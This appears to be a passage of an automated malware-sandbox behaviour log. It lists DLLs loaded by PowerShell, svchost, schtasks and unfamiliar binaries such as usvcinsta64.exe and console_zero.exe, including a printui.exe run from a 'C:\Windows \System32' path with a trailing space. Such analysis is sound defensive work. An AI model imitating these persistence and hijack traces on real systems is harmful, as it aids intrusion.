Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\usvcinsta64.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\usvcinsta64.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\System32\usvcinsta64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\usvcinsta64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows \System32\printui.exeSection loaded: uxtheme.dll
Source: C:\Windows \System32\printui.exeSection loaded: printui.dll
Source: C:\Windows \System32\printui.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libcurl.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libpq.dll
Source: C:\Windows\System32\svchost.exeSection loaded: zlib1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libssl-3-x64.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libcrypto-3-x64.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libintl-9.dll
Source: C:\Windows\System32\svchost.exeSection loaded: secur32.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libcrypto-3-x64.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libwinpthread-1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libiconv-2.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: libcurl.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: zlib1.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: libcurl.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: zlib1.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
